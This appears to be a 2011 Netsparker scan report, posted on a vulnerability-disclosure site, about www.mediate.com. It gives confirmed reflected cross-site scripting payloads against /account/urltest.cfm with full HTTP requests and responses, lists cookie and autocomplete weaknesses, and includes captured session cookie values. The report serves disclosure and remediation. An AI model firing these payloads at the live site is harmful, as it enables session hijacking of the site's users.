XSS, Cross Site Scripting in www.mediate.com, CWE-79, CAPEC-86, DORK, GHDB

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler

Private Reporting of Security Research is preferred for Online Service Providers


Loading

Netsparker - Scan Report Summary
TARGET URL
https://www.mediate.com/account/
SCAN DATE
4/21/2011 7:40:07 PM
REPORT DATE
4/21/2011 7:44:43 PM
SCAN DURATION
00:02:09

Total Requests

1158

Average Speed

8.94 req/sec.
9
identified
7
confirmed
0
critical
3
informational

GHDB, DORK Tests

GHDB, DORK Tests
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
44 %
LOW
22 %
INFORMATION
33 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/account/ Cookie Not Marked As Secure Yes
Auto Complete Enabled Yes
Cookie Not Marked As HttpOnly Yes
IIS Version Disclosure No
/account/js/ Forbidden Resource Yes
/account/urltest.cfm xurl GET Cross-site Scripting Yes
whichdomain POST Cross-site Scripting Yes
xurl POST Cross-site Scripting Yes
/account/viewglossary.cfm E-mail Address Disclosure No
Cross-site Scripting

Cross-site Scripting

3 TOTAL
IMPORTANT
CONFIRMED
3
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /account/urltest.cfm

/account/urltest.cfm CONFIRMED

https://www.mediate.com/account/urltest.cfm?xurl='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert..

Parameters

Parameter Type Value
xurl GET '"--></style></script><script>alert(0x0000E4)</script>

Request

GET /account/urltest.cfm?xurl='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000E4)%3C/script%3E HTTP/1.1
Referer: https://www.mediate.com/account/orders.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.mediate.com
Cookie: CFID=7215060; CFTOKEN=97254911; CART_ID=798; THISAC=214; THISCOUNTRY=USA; LASTLOGIN=%7Bts%20%272011%2D04%2D21%2017%3A42%3A36%27%7D; MIRCCOMMENTER=7966319
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 22 Apr 2011 00:43:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8



<!-- Cart_id: 798. CFID= 7215060. CFTOKEN= 97254911. -->



<HTML>
<BODY>
<font face="verdana,arial,helvetica" size="2">
<CENTER>
<b>URL Availability Test:</b><br><br>
<form action="urltest.cfm" method="post">
<input type="hidden" name="whichdomain" value="mediate.com">
URL:
<font size="1">http://</font><input type="text" name="xurl" size=30 value="'"--></style></script><script>netsparker(0x0000E4)</script>"><br>
<font size=1>(Enter desired url at mediate.com)</font><br><br>


<b><font color="red">Invalid. Try entering www.mediate.com/{yourname}</font></b>
<br>


<br>
<input type="submit" value="Test Another">
or
<a href="javascript:this.close()">Close</a>
</CENTER>
</BODY>
</HTML>

- /account/urltest.cfm

/account/urltest.cfm CONFIRMED

https://www.mediate.com/account/urltest.cfm

Parameters

Parameter Type Value
whichdomain POST '"--></style></script><script>alert(0x0000F6)</script>
xurl POST 3

Request

POST /account/urltest.cfm HTTP/1.1
Referer: https://www.mediate.com/account/urltest.cfm?xurl=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.mediate.com
Cookie: CFID=7215175; CFTOKEN=55518477; CART_ID=582; THISAC=214; THISCOUNTRY=USA; LASTLOGIN=%7Bts%20%272011%2D04%2D21%2017%3A42%3A36%27%7D; MIRCCOMMENTER=7966319
Content-Length: 104
Accept-Encoding: gzip, deflate

whichdomain='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0000F6)%3c%2fscript%3e&xurl=3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 22 Apr 2011 00:44:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8



<!-- Cart_id: 582. CFID= 7215175. CFTOKEN= 55518477. -->



<HTML>
<BODY>
<font face="verdana,arial,helvetica" size="2">
<CENTER>
<b>URL Availability Test:</b><br><br>
<form action="urltest.cfm" method="post">
<input type="hidden" name="whichdomain" value="'"--></style></script><script>netsparker(0x0000F6)</script>">
URL:
<font size="1">http://</font><input type="text" name="xurl" size=30 value="3"><br>
<font size=1>(Enter desired url at '"--></style></script><script>netsparker(0x0000F6)</script>)</font><br><br>


<b><font color="red">Invalid. Try entering www.'"--></style></script><script>netsparker(0x0000F6)</script>/{yourname}</font></b>
<br>


<br>
<input type="submit" value="Test Another">
or
<a href="javascript:this.close()">Close</a>
</CENTER>
</BODY>
</HTML>

- /account/urltest.cfm

/account/urltest.cfm CONFIRMED

https://www.mediate.com/account/urltest.cfm

Parameters

Parameter Type Value
whichdomain POST mediate.com
xurl POST '"--></style></script><script>alert(0x0000FB)</script>

Request

POST /account/urltest.cfm HTTP/1.1
Referer: https://www.mediate.com/account/urltest.cfm?xurl=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.mediate.com
Cookie: CFID=7215175; CFTOKEN=55518477; CART_ID=582; THISAC=214; THISCOUNTRY=USA; LASTLOGIN=%7Bts%20%272011%2D04%2D21%2017%3A42%3A36%27%7D; MIRCCOMMENTER=7966319
Content-Length: 114
Accept-Encoding: gzip, deflate

whichdomain=mediate.com&xurl='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0000FB)%3c%2fscript%3e

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 22 Apr 2011 00:44:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8



<!-- Cart_id: 582. CFID= 7215175. CFTOKEN= 55518477. -->



<HTML>
<BODY>
<font face="verdana,arial,helvetica" size="2">
<CENTER>
<b>URL Availability Test:</b><br><br>
<form action="urltest.cfm" method="post">
<input type="hidden" name="whichdomain" value="mediate.com">
URL:
<font size="1">http://</font><input type="text" name="xurl" size=30 value="'"--></style></script><script>netsparker(0x0000FB)</script>"><br>
<font size=1>(Enter desired url at mediate.com)</font><br><br>


<b><font color="red">Invalid. Try entering www.mediate.com/{yourname}</font></b>
<br>


<br>
<input type="submit" value="Test Another">
or
<a href="javascript:this.close()">Close</a>
</CENTER>
</BODY>
</HTML>

Cookie Not Marked As Secure

Cookie Not Marked As Secure

1 TOTAL
IMPORTANT
CONFIRMED
1
A Cookie was not marked as secure and transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic or following a successful MITM (Man in the middle) attack.

Impact

This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie) an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force victim to make a HTTP request to steal the cookie.

Actions to Take

  1. See the remedy for solution.
  2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information you do not have to mark it as secure.))

Remedy

Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation

To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or victim's network. Attackers need to be understand layer 2, have physical access to systems either as way points for the traffic, or locally (have gained access to) to a system between the victim and the web server.
- /account/

/account/ CONFIRMED

https://www.mediate.com/account/

Identified Cookie

CFID

Request

GET /account/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.mediate.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 22 Apr 2011 00:42:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=7214712;expires=Sun, 14-Apr-2041 00:42:38 GMT;path=/,CFTOKEN=65155520;expires=Sun, 14-Apr-2041 00:42:38 GMT;path=/,CART_ID=755;expires=Tue, 26-Apr-2011 00:42:38 GMT;path=/,MIRCCOMMENTER=7966319;expires=Wed, 20-Apr-2016 00:42:38 GMT;path=/,THISAC=214;expires=Wed, 20-Apr-2016 00:42:38 GMT;path=/,THISCOUNTRY=USA;expires=Wed, 20-Apr-2016 00:42:38 GMT;path=/,LASTLOGIN=%7Bts%20%272011%2D04%2D21%2017%3A42%3A36%27%7D;expires=Sat, 21-Apr-2012 00:42:38 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!-- Copyright 1998-2007 Resourceful Internet Solution, Inc. All rights reserved. -->



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>

<HEAD><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script><script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>
<TITLE>Log In To Mediate.com</TITLE>
<META name="description" content="Your Mediate.com Account">
<META name="keywords" content="mediation, mediate, mediator,lawyer,conflict resolution,mediators, training, mediation training, public policy, dispute, ADR,facilitation, meeting management, process, communication, barriers, divorce, workplace, effects,custody,resolution,conflict management,parenting,gender">
<SCRIPT language="JavaScript" src="../navload.js"></SCRIPT>
<script language="JavaScript" src="orders.js"></script>
<LINK href="../mainstyle2.css" rel="stylesheet" type="text/css">


<link href="../css/accordian.css" type="text/css" rel="stylesheet">

<script type="text/javascript" src="js/prototype.js"></script>
<script type="text/javascript" src="js/effects.js"></script>
<script type="text/javascript" src="js/accordion.js"></script>



<script type="text/javascript">

//
// In my case I want to load them onload, this is how you do it!
//
//Event.observe(window, 'load', loadAccordions, false);

//
// Set up all accordions
//
function loadAccordions() {
var topAccordion = new accordion('vertical_container', {
classNames : {
toggle : 'vertical_accordion_toggle',
toggleActive : 'vertical_accordion_toggle_active',
content : 'vertical_accordion_content'
},
defaultSize : {
width : 750
},
direction : 'vertical'
});

var bottomAccordion = new accordion('vertical_container');

var nestedVerticalAccordion = new accordion('vertical_nested_container', {
classNames : {
toggle : 'vertical_accordion_toggle',
toggleActive : 'vertical_accordion_toggle_active',
content : 'vertical_accordion_content'
}
});

// Open first one
bottomAccordion.activate($$('#vertical_container .accordion_toggle')[0]);

// Open second one
//topAccordion.activate($$('#horizontal_container .horizontal_accordion_toggle')[2]);
}

function Poktoconvert(clientid,productid) {
var msg = 'Are you sure you want to convert this expired '+productid+' to LAM1A?';
if (confirm(msg))
location="../order/convtolam1a.cfm?clientid=" + clientid + "&productid=" + productid;
}

function Poktoactivate(clientid) {
var msg = 'Please confirm: ok to activate your membership?';

if (confirm(msg))
location="../order/activatemembership.cfm?clientid=" + clientid;
}

</script>


<script type="text/javascript"> if (window.ColdFusion) ColdFusion.required['username']=true;</script><script type="text/javascript"> if (window.ColdFusion) ColdFusion.required['pw']=true;</script><script type="text/javascript"><!-- _CF_checkCFForm_1 = function(_CF_this) { //reset on submit _CF_error_exists = false; _CF_error_messages = new Array(); _CF_error_fields = new Object(); _CF_FirstErrorField = null; //form element username required check if( !_CF_hasValue(_CF_this['username'], "TEXT", false ) ) { _CF_onError(_CF_this, "username", _CF_this['username'].value, "Enter your user id"); _CF_error_exists = true; } //form element pw required check if( !_CF_hasValue(_CF_this['pw'], "PASSWORD", false ) ) { _CF_onError(_CF_this, "pw", _CF_this['pw'].value, "Enter password"); _CF_error_exists = true; } //display error messages and return success if( _CF_error_exists ) { if( _CF_error_messages.length > 0 ) { // show alert() message _CF_onErrorAlert(_CF_error_messages); // set focus to first form error, if the field supports js focus(). if( _CF_this[_CF_FirstErrorField].type == "text" ) { _CF_this[_CF_FirstErrorField].focus(); } } return false; }else { return true; } }//--></script></HEAD>

<BODY>

<DESCRIPTION></DESCRIPTION>






<script language="JavaScript" type="text/JavaScript">
<!--
function lamin() {
stateval = "";
for(var i=0; i < lamform.stateprovince.options.length; i++)
if (lamform.stateprovince.options[i].selected)
stateval = lamform.stateprovince.options[i].value;
if (lamform.ac.value>0 && stateval!='') {
alert("Select either the area code OR the state but not both");
return false;
}
}
//-->
</script>




<!-- 12321 173.193.214.243 -->


<TABLE WIDTH="990" BORDER="0" CELLPADDING="0" CELLSPACING="0" CLASS="med-tp-bar" align="center">
<TR>

<TD WIDTH="428" class="topcells">

<A HREF="http://www.mediate.com/index.cfm"><IMG SRC="https://www.mediate.com/micart/nav_top_lft_2009.gif" WIDTH="427" HEIGHT="87" BORDER="0" alt="Mediate.com - Complete information about mediation and mediators"></A></td>

<TD WIDTH="539" align="right" class="topcells" style="padding-right:10px;"><form action="http://www.mediate.com/search.cfm" method="post" style="padding:0px; margin:0px">
<SPAN style="font-size:1.1em;color:#CCCCCC;font-weight:bold">Search content: &nbsp;</SPAN>
<select name="stext" style="font-size:11px;">
<option value="">&nbsp;&nbsp;&nbsp;&nbsp;--- Topic ---&nbsp;&nbsp;&nbsp;

<option value=":about/index.cfm:">About Mediation</option>

<option value="Academic,university, graduate" >Academic</option>

<option value="ADA,disability, Americans With Disabilities Act" >ADA</option>

<option value=":adrnews/index.cfm:">ADR News</option>

<option value="Africa,African" >Africa</option>

<option value="Apology,confession, explanation, guilt, apologize" >Apology</option>

<option value="Arbitration,arbitrate, arbitrator" >Arbitration</option>

<option value="Asia,Asia, China, India, Pakastan, Japan, Australia, New Zealand, Korea, Viet Nam" >Asia</option>

<option value="Australia,Aussie" >Australia</option>

<option value="Best Practice" >Best Practice</option>

<option value="Blog Archive" >Blog Archive</option>

<option value=":blogs/index.cfm:">Blogs</option>

<option value="Book Reviews,book" >Book Reviews</option>

<option value="Bullying,Bully" >Bullying</option>

<option value="CA Canada,Canadian" >CA - Canada</option>

<option value=":careers/index.cfm:">Careers in ADR</option>

<option value="Coaching,coach" >Coaching</option>

<option value="Collab Practice,collaborative law" >Collab Practice</option>

<option value="Commercial,business" >Commercial</option>

<option value="Communication" >Communication</option>

<option value="Community" >Community</option>

<option value="Confidentiality,privacy, confidential" >Confidentiality</option>

<option value="Conflict Theory,theory" >Conflict Theory</option>

<option value="Construction" >Construction</option>

<option value="Courts Legal" >Courts - Legal</option>

<option value="Custody,parenting, parenting plan" >Custody</option>

<option value="Diplomacy" >Diplomacy</option>

<option value="Diversity,minority, race, ethnic" >Diversity</option>

<option value="Divorce" >Divorce</option>

<option value="Elder,senior" >Elder</option>

<option value="Employment,employee" >Employment</option>

<option value="Environment" >Environment</option>

<option value="Espanol,Spanish" >Espanol</option>

<option value="Ethics,standards" >Ethics</option>

<option value="EU,Europe, European" >EU</option>

<option value="Facilitation" >Facilitation</option>

<option value="Family" >Family</option>

<option value="Foreclosure" >Foreclosure</option>

<option value="Gay,homosexual, lesbian" >Gay</option>

<option value="Gender" >Gender</option>

<option value="Government" >Government</option>

<option value="Health,medical, hospital" >Health</option>

<option value="Humor,comedy" >Humor</option>

<option value="International" >International</option>

<option value="Interviews" >Interviews</option>

<option value="Keystone Conf.,Keystone" >Keystone Conf.</option>

<option value="Labor,FMCS" >Labor</option>

<option value="Latin America" >Latin America</option>

<option value="Leadership,Leader" >Leadership</option>

<option value="Legislation" >Legislation</option>

<option value="Letters to Editor" >Letters to Editor</option>

<option value="Marital Mediation,marriage" >Marital Mediation</option>

<option value="Mediation Policy" >Mediation Policy</option>

<option value="Mediation Practice" >Mediation Practice</option>

<option value="Mediation Skills,technique" >Mediation Skills</option>

<option value="Memorials" >Memorials</option>

<option value="Middle East,Israel, Terror, Iran, Iraq, Syria, Lebanon, Egypt, Jordon, Saudi Arabia" >Middle East</option>

<option value="Negotiation" >Negotiation</option>

<option value=":newsletters/index.cfm:">Newsletters</option>

<option value="Online DR,internet, ODR" >Online DR</option>

<option value="Partnering" >Partnering</option>

<option value="Peer Mediation" >Peer Mediation</option>

<option value="Probate,estate, elder" >Probate</option>

<option value="Psychological,mental, emotional" >Psychological</option>

<option value="Public Policy" >Public Policy</option>

<option value="Recommended,recommend" >Recommended</option>

<option value="Reports,report" >Reports</option>

<option value="Restorative,VORP, VOMA" >Restorative</option>

<option value="Schools,school" >Schools</option>

<option value="Simulations" >Simulations</option>

<option value="Special Education,special ed" >Special Education</option>

<option value="Spirituality" >Spirituality</option>

<option value="Standards" >Standards</option>

<option value="System Design,systems" >System Design</option>

<option value="Technology" >Technology</option>

<option value="Terrorism,terror" >Terrorism</option>

<option value="Testimonials" >Testimonials</option>

<option value="Training" >Training</option>

<option value="Transformative" >Transformative</option>

<option value="UK,England, British, Britain, Ireland, Scotland, Wales" >UK</option>

<option value="UMA,uniform mediation act" >UMA</option>

<option value="UPL,unauthorized practice of law" >UPL</option>

<option value="Video Best Clips" >Video Best Clips</option>

<option value="Workplace,work" >Workplace</option>

<option value="Youth,school" >Youth</option>

</SELECT>

<SPAN style="font-size:12px;color:#CCCCCC">&nbsp;&nbsp;and/or search terms</SPAN>&nbsp;&nbsp;
<input type="text" name="stext" style="font-size:11px;width:125px">
<input type="submit" name="GO" id="yllwgo" value="GO">
</FORM></td>
</TR>
</TABLE>






<TABLE WIDTH="990" BORDER="0" CELLPADDING="0" CELLSPACING="0" align="center" style="background-color:#fff">
<TR>
<TD class="contentcell" valign="top" style="padding: 0 30px 0 30px">





<h2 id="hdr">Log In To Mediate.com</h2>

<hr id="hr">



<BR>
<form name="CFForm_1" id="CFForm_1" action="https://www.mediate.com/order/account.cfm" method="post" onsubmit="return _CF_checkCFForm_1(this)">
<input type="hidden" name="pwcheck" value="ad31cc91272e">



<table border="0" align="center" cellspacing="0" bgcolor="f2f2f2" style="font-family:arial; font-size:12px; text-align:left;margin-top:25px; margin-bottom:25px;border:1px solid #000;width:580px">
<tr>
<td bgcolor="#000066" style="padding:7px; font-size:14px;font-weight:bold;color:#fff ; ">Sign in to access your Mediate.com account:</td>
</tr>
<tr><td style="font-family:verdana,arial,san-serif; font-size:12px; padding:10px 0 0 200px">


Client ID:&nbsp;&nbsp;&nbsp;<input name="username" id="username" type="text" maxlength="20" size="20" />

<br>

Password: <input name="pw" id="pw" type="password" maxlength="20" size="20" />



</td></tr>

<tr><td height="30" style="font-family:verdana,arial,san-serif; font-size:12px;text-align:center;" size="25">
<INPUT TYPE="submit" value="&nbsp;&nbsp;&nbsp;&nbsp;OK&nbsp;&nbsp;&nbsp;&nbsp;">

</td>
</tr>
<TR>
<td colspan="2" align="center" style="padding-bottom:15px">
<br>
<font face="Arial,Helvetica" size="2">
<i><a href="/order/pwd.cfm?camefrom=%2Faccount%2Findex%2Ecfm">Forget your password?</a></i>
</font>
</td>
</TR>
</table>


</form>
<br>
<br>
<br>
<br>
<br>
<br><br>
<br>
<br>
<br>
<br>

<br>
<br>
<br>





<br>
<br>
<br>


<div align="center" style="margin-top:20px;font-size:12px;">
<a href="http://www.mediate.com/mediator/search.cfm">Mediator Di..
Auto Complete Enabled

Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /account/

/account/ CONFIRMED

https://www.mediate.com/account/

Identified Field Name

pw

Request

GET /account/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.mediate.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 22 Apr 2011 00:42:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=7214712;expires=Sun, 14-Apr-2041 00:42:38 GMT;path=/,CFTOKEN=65155520;expires=Sun, 14-Apr-2041 00:42:38 GMT;path=/,CART_ID=755;expires=Tue, 26-Apr-2011 00:42:38 GMT;path=/,MIRCCOMMENTER=7966319;expires=Wed, 20-Apr-2016 00:42:38 GMT;path=/,THISAC=214;expires=Wed, 20-Apr-2016 00:42:38 GMT;path=/,THISCOUNTRY=USA;expires=Wed, 20-Apr-2016 00:42:38 GMT;path=/,LASTLOGIN=%7Bts%20%272011%2D04%2D21%2017%3A42%3A36%27%7D;expires=Sat, 21-Apr-2012 00:42:38 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!-- Copyright 1998-2007 Resourceful Internet Solution, Inc. All rights reserved. -->



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>

<HEAD><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script><script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>
<TITLE>Log In To Mediate.com</TITLE>
<META name="description" content="Your Mediate.com Account">
<META name="keywords" content="mediation, mediate, mediator,lawyer,conflict resolution,mediators, training, mediation training, public policy, dispute, ADR,facilitation, meeting management, process, communication, barriers, divorce, workplace, effects,custody,resolution,conflict management,parenting,gender">
<SCRIPT language="JavaScript" src="../navload.js"></SCRIPT>
<script language="JavaScript" src="orders.js"></script>
<LINK href="../mainstyle2.css" rel="stylesheet" type="text/css">


<link href="../css/accordian.css" type="text/css" rel="stylesheet">

<script type="text/javascript" src="js/prototype.js"></script>
<script type="text/javascript" src="js/effects.js"></script>
<script type="text/javascript" src="js/accordion.js"></script>



<script type="text/javascript">

//
// In my case I want to load them onload, this is how you do it!
//
//Event.observe(window, 'load', loadAccordions, false);

//
// Set up all accordions
//
function loadAccordions() {
var topAccordion = new accordion('vertical_container', {
classNames : {
toggle : 'vertical_accordion_toggle',
toggleActive : 'vertical_accordion_toggle_active',
content : 'vertical_accordion_content'
},
defaultSize : {
width : 750
},
direction : 'vertical'
});

var bottomAccordion = new accordion('vertical_container');

var nestedVerticalAccordion = new accordion('vertical_nested_container', {
classNames : {
toggle : 'vertical_accordion_toggle',
toggleActive : 'vertical_accordion_toggle_active',
content : 'vertical_accordion_content'
}
});

// Open first one
bottomAccordion.activate($$('#vertical_container .accordion_toggle')[0]);

// Open second one
//topAccordion.activate($$('#horizontal_container .horizontal_accordion_toggle')[2]);
}

function Poktoconvert(clientid,productid) {
var msg = 'Are you sure you want to convert this expired '+productid+' to LAM1A?';
if (confirm(msg))
location="../order/convtolam1a.cfm?clientid=" + clientid + "&productid=" + productid;
}

function Poktoactivate(clientid) {
var msg = 'Please confirm: ok to activate your membership?';

if (confirm(msg))
location="../order/activatemembership.cfm?clientid=" + clientid;
}

</script>


<script type="text/javascript"> if (window.ColdFusion) ColdFusion.required['username']=true;</script><script type="text/javascript"> if (window.ColdFusion) ColdFusion.required['pw']=true;</script><script type="text/javascript"><!-- _CF_checkCFForm_1 = function(_CF_this) { //reset on submit _CF_error_exists = false; _CF_error_messages = new Array(); _CF_error_fields = new Object(); _CF_FirstErrorField = null; //form element username required check if( !_CF_hasValue(_CF_this['username'], "TEXT", false ) ) { _CF_onError(_CF_this, "username", _CF_this['username'].value, "Enter your user id"); _CF_error_exists = true; } //form element pw required check if( !_CF_hasValue(_CF_this['pw'], "PASSWORD", false ) ) { _CF_onError(_CF_this, "pw", _CF_this['pw'].value, "Enter password"); _CF_error_exists = true; } //display error messages and return success if( _CF_error_exists ) { if( _CF_error_messages.length > 0 ) { // show alert() message _CF_onErrorAlert(_CF_error_messages); // set focus to first form error, if the field supports js focus(). if( _CF_this[_CF_FirstErrorField].type == "text" ) { _CF_this[_CF_FirstErrorField].focus(); } } return false; }else { return true; } }//--></script></HEAD>

<BODY>

<DESCRIPTION></DESCRIPTION>






<script language="JavaScript" type="text/JavaScript">
<!--
function lamin() {
stateval = "";
for(var i=0; i < lamform.stateprovince.options.length; i++)
if (lamform.stateprovince.options[i].selected)
stateval = lamform.stateprovince.options[i].value;
if (lamform.ac.value>0 && stateval!='') {
alert("Select either the area code OR the state but not both");
return false;
}
}
//-->
</script>




<!-- 12321 173.193.214.243 -->


<TABLE WIDTH="990" BORDER="0" CELLPADDING="0" CELLSPACING="0" CLASS="med-tp-bar" align="center">
<TR>

<TD WIDTH="428" class="topcells">

<A HREF="http://www.mediate.com/index.cfm"><IMG SRC="https://www.mediate.com/micart/nav_top_lft_2009.gif" WIDTH="427" HEIGHT="87" BORDER="0" alt="Mediate.com - Complete information about mediation and mediators"></A></td>

<TD WIDTH="539" align="right" class="topcells" style="padding-right:10px;"><form action="http://www.mediate.com/search.cfm" method="post" style="padding:0px; margin:0px">
<SPAN style="font-size:1.1em;color:#CCCCCC;font-weight:bold">Search content: &nbsp;</SPAN>
<select name="stext" style="font-size:11px;">
<option value="">&nbsp;&nbsp;&nbsp;&nbsp;--- Topic ---&nbsp;&nbsp;&nbsp;

<option value=":about/index.cfm:">About Mediation</option>

<option value="Academic,university, graduate" >Academic</option>

<option value="ADA,disability, Americans With Disabilities Act" >ADA</option>

<option value=":adrnews/index.cfm:">ADR News</option>

<option value="Africa,African" >Africa</option>

<option value="Apology,confession, explanation, guilt, apologize" >Apology</option>

<option value="Arbitration,arbitrate, arbitrator" >Arbitration</option>

<option value="Asia,Asia, China, India, Pakastan, Japan, Australia, New Zealand, Korea, Viet Nam" >Asia</option>

<option value="Australia,Aussie" >Australia</option>

<option value="Best Practice" >Best Practice</option>

<option value="Blog Archive" >Blog Archive</option>

<option value=":blogs/index.cfm:">Blogs</option>

<option value="Book Reviews,book" >Book Reviews</option>

<option value="Bullying,Bully" >Bullying</option>

<option value="CA Canada,Canadian" >CA - Canada</option>

<option value=":careers/index.cfm:">Careers in ADR</option>

<option value="Coaching,coach" >Coaching</option>

<option value="Collab Practice,collaborative law" >Collab Practice</option>

<option value="Commercial,business" >Commercial</option>

<option value="Communication" >Communication</option>

<option value="Community" >Community</option>

<option value="Confidentiality,privacy, confidential" >Confidentiality</option>

<option value="Conflict Theory,theory" >Conflict Theory</option>

<option value="Construction" >Construction</option>

<option value="Courts Legal" >Courts - Legal</option>

<option value="Custody,parenting, parenting plan" >Custody</option>

<option value="Diplomacy" >Diplomacy</option>

<option value="Diversity,minority, race, ethnic" >Diversity</option>

<option value="Divorce" >Divorce</option>

<option value="Elder,senior" >Elder</option>

<option value="Employment,employee" >Employment</option>

<option value="Environment" >Environment</option>

<option value="Espanol,Spanish" >Espanol</option>

<option value="Ethics,standards" >Ethics</option>

<option value="EU,Europe, European" >EU</option>

<option value="Facilitation" >Facilitation</option>

<option value="Family" >Family</option>

<option value="Foreclosure" >Foreclosure</option>

<option value="Gay,homosexual, lesbian" >Gay</option>

<option value="Gender" >Gender</option>

<option value="Government" >Government</option>

<option value="Health,medical, hospital" >Health</option>

<option value="Humor,comedy" >Humor</option>

<option value="International" >International</option>

<option value="Interviews" >Interviews</option>

<option value="Keystone Conf.,Keystone" >Keystone Conf.</option>

<option value="Labor,FMCS" >Labor</option>

<option value="Latin America" >Latin America</option>

<option value="Leadership,Leader" >Leadership</option>

<option value="Legislation" >Legislation</option>

<option value="Letters to Editor" >Letters to Editor</option>

<option value="Marital Mediation,marriage" >Marital Mediation</option>

<option value="Mediation Policy" >Mediation Policy</option>

<option value="Mediation Practice" >Mediation Practice</option>

<option value="Mediation Skills,technique" >Mediation Skills</option>

<option value="Memorials" >Memorials</option>

<option value="Middle East,Israel, Terror, Iran, Iraq, Syria, Lebanon, Egypt, Jordon, Saudi Arabia" >Middle East</option>

<option value="Negotiation" >Negotiation</option>

<option value=":newsletters/index.cfm:">Newsletters</option>

<option value="Online DR,internet, ODR" >Online DR</option>

<option value="Partnering" >Partnering</option>

<option value="Peer Mediation" >Peer Mediation</option>

<option value="Probate,estate, elder" >Probate</option>

<option value="Psychological,mental, emotional" >Psychological</option>

<option value="Public Policy" >Public Policy</option>

<option value="Recommended,recommend" >Recommended</option>
